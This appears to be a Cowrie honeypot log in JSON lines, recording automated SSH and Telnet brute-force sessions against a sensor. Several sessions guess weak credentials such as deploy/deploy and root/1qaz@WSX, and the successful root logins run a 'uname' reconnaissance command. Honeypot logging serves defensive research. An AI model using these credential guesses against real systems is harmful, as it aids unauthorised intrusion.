{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:09:12.479548Z","src_ip":"212.227.125.160","session":"dfbd4ac4c6d6"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-28T07:09:13.260343Z","src_ip":"212.227.125.160","session":"dfbd4ac4c6d6"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:09:14.478918Z","src_ip":"212.227.125.160","session":"dfbd4ac4c6d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50600,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ff0cecfda3d","protocol":"ssh","message":"New connection: 212.227.235.229:50600 (1.2.3.4:22) [session: 2ff0cecfda3d]","sensor":"my-vps","timestamp":"2025-08-28T07:09:19.015582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:09:19.017236Z","src_ip":"212.227.235.229","session":"2ff0cecfda3d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:09:19.266533Z","src_ip":"212.227.235.229","session":"2ff0cecfda3d"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":54336,"dst_ip":"1.2.3.4","dst_port":23,"session":"362b569eb790","protocol":"telnet","message":"New connection: 8.222.212.69:54336 (1.2.3.4:23) [session: 362b569eb790]","sensor":"my-vps","timestamp":"2025-08-28T07:09:19.847892Z"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-28T07:09:20.017381Z","src_ip":"212.227.235.229","session":"2ff0cecfda3d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:09:21.269527Z","src_ip":"212.227.235.229","session":"2ff0cecfda3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50840,"dst_ip":"1.2.3.4","dst_port":22,"session":"d512731fb194","protocol":"ssh","message":"New connection: 212.227.125.160:50840 (1.2.3.4:22) [session: d512731fb194]","sensor":"my-vps","timestamp":"2025-08-28T07:09:28.893012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:09:28.898043Z","src_ip":"212.227.125.160","session":"d512731fb194"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:09:29.108687Z","src_ip":"212.227.125.160","session":"d512731fb194"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:09:29.968245Z","src_ip":"212.227.125.160","session":"d512731fb194"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:09:30.515888Z","src_ip":"212.227.125.160","session":"d512731fb194"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:09:30.516597Z","src_ip":"212.227.125.160","session":"d512731fb194"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:09:30.732728Z","src_ip":"212.227.125.160","session":"d512731fb194"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:09:30.734004Z","src_ip":"212.227.125.160","session":"d512731fb194"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44712,"dst_ip":"1.2.3.4","dst_port":22,"session":"451b8843ead6","protocol":"ssh","message":"New connection: 212.227.235.229:44712 (1.2.3.4:22) [session: 451b8843ead6]","sensor":"my-vps","timestamp":"2025-08-28T07:09:35.432646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:09:35.433304Z","src_ip":"212.227.235.229","session":"451b8843ead6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:09:35.693901Z","src_ip":"212.227.235.229","session":"451b8843ead6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55500,"dst_ip":"1.2.3.4","dst_port":22,"session":"eecfba789da4","protocol":"ssh","message":"New connection: 217.72.205.35:55500 (1.2.3.4:22) [session: eecfba789da4]","sensor":"my-vps","timestamp":"2025-08-28T07:09:36.223499Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:09:36.224468Z","src_ip":"217.72.205.35","session":"eecfba789da4"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:09:36.478941Z","src_ip":"212.227.235.229","session":"451b8843ead6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:09:37.083258Z","src_ip":"212.227.235.229","session":"451b8843ead6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:09:37.084532Z","src_ip":"212.227.235.229","session":"451b8843ead6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:09:37.346716Z","src_ip":"212.227.235.229","session":"451b8843ead6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:09:37.347803Z","src_ip":"212.227.235.229","session":"451b8843ead6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41172,"dst_ip":"1.2.3.4","dst_port":22,"session":"b33d41b43781","protocol":"ssh","message":"New connection: 212.227.125.160:41172 (1.2.3.4:22) [session: b33d41b43781]","sensor":"my-vps","timestamp":"2025-08-28T07:09:45.195336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:09:45.220002Z","src_ip":"212.227.125.160","session":"b33d41b43781"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:09:45.410213Z","src_ip":"212.227.125.160","session":"b33d41b43781"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-28T07:09:46.270023Z","src_ip":"212.227.125.160","session":"b33d41b43781"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:09:47.486079Z","src_ip":"212.227.125.160","session":"b33d41b43781"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43096,"dst_ip":"1.2.3.4","dst_port":22,"session":"85a599af561e","protocol":"ssh","message":"New connection: 212.227.235.229:43096 (1.2.3.4:22) [session: 85a599af561e]","sensor":"my-vps","timestamp":"2025-08-28T07:09:51.768840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:09:51.769922Z","src_ip":"212.227.235.229","session":"85a599af561e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:09:52.020714Z","src_ip":"212.227.235.229","session":"85a599af561e"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-28T07:09:52.777451Z","src_ip":"212.227.235.229","session":"85a599af561e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:09:54.030802Z","src_ip":"212.227.235.229","session":"85a599af561e"}
{"eventid":"cowrie.session.closed","duration":39.16896080970764,"message":"Connection lost after 39 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:09:59.016781Z","src_ip":"8.222.212.69","session":"362b569eb790"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42252,"dst_ip":"1.2.3.4","dst_port":22,"session":"d07bcd3460f3","protocol":"ssh","message":"New connection: 212.227.125.160:42252 (1.2.3.4:22) [session: d07bcd3460f3]","sensor":"my-vps","timestamp":"2025-08-28T07:10:01.533747Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:10:01.537055Z","src_ip":"212.227.125.160","session":"d07bcd3460f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:10:01.757329Z","src_ip":"212.227.125.160","session":"d07bcd3460f3"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-28T07:10:02.655341Z","src_ip":"212.227.125.160","session":"d07bcd3460f3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:10:03.881204Z","src_ip":"212.227.125.160","session":"d07bcd3460f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32932,"dst_ip":"1.2.3.4","dst_port":22,"session":"744a629e93e6","protocol":"ssh","message":"New connection: 212.227.235.229:32932 (1.2.3.4:22) [session: 744a629e93e6]","sensor":"my-vps","timestamp":"2025-08-28T07:10:08.177797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:10:08.178793Z","src_ip":"212.227.235.229","session":"744a629e93e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:10:08.432112Z","src_ip":"212.227.235.229","session":"744a629e93e6"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-28T07:10:09.194431Z","src_ip":"212.227.235.229","session":"744a629e93e6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:10:10.450619Z","src_ip":"212.227.235.229","session":"744a629e93e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33184,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2b4e1009366","protocol":"ssh","message":"New connection: 212.227.125.160:33184 (1.2.3.4:22) [session: a2b4e1009366]","sensor":"my-vps","timestamp":"2025-08-28T07:10:18.017484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:10:18.019636Z","src_ip":"212.227.125.160","session":"a2b4e1009366"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:10:18.238145Z","src_ip":"212.227.125.160","session":"a2b4e1009366"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:10:18.895127Z","src_ip":"212.227.125.160","session":"a2b4e1009366"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:10:20.118926Z","src_ip":"212.227.125.160","session":"a2b4e1009366"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39094,"dst_ip":"1.2.3.4","dst_port":22,"session":"cead93129928","protocol":"ssh","message":"New connection: 212.227.235.229:39094 (1.2.3.4:22) [session: cead93129928]","sensor":"my-vps","timestamp":"2025-08-28T07:10:24.580236Z"}
